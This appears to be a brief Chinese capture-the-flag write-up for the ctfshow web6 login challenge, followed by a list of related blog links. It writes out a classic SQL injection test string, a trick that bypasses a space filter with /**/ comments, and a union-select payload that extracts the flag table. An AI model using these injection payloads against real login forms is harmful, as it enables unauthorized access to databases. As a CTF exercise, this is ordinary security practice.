ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
竹言笙熙9 小时前
代码审计初探
学习·web安全
网络安全King11 小时前
华为 网络安全 认证
安全·web安全
网络安全-老纪12 小时前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
underatted12 小时前
2025tg最新免费社工库机器人
web安全·网络安全
网安加云课堂17 小时前
课程分享 | 安全系统建设的挑战与解决方案
网络·安全·web安全
黑客Ela18 小时前
网络安全营运周报
网络·安全·web安全
挣扎与觉醒中的技术人19 小时前
网络安全入门持续学习与进阶路径(一)
网络·c++·学习·程序人生·安全·web安全
黑客笔记20 小时前
ChatGPT超级AI对话模型 黑客十问十答
人工智能·web安全·网络安全
网络安全King1 天前
devops 工具 网络安全
运维·web安全·devops
你怎么睡得着的!1 天前
【护网行动-红蓝攻防】第一章-红蓝对抗基础 认识红蓝紫
网络·安全·web安全·网络安全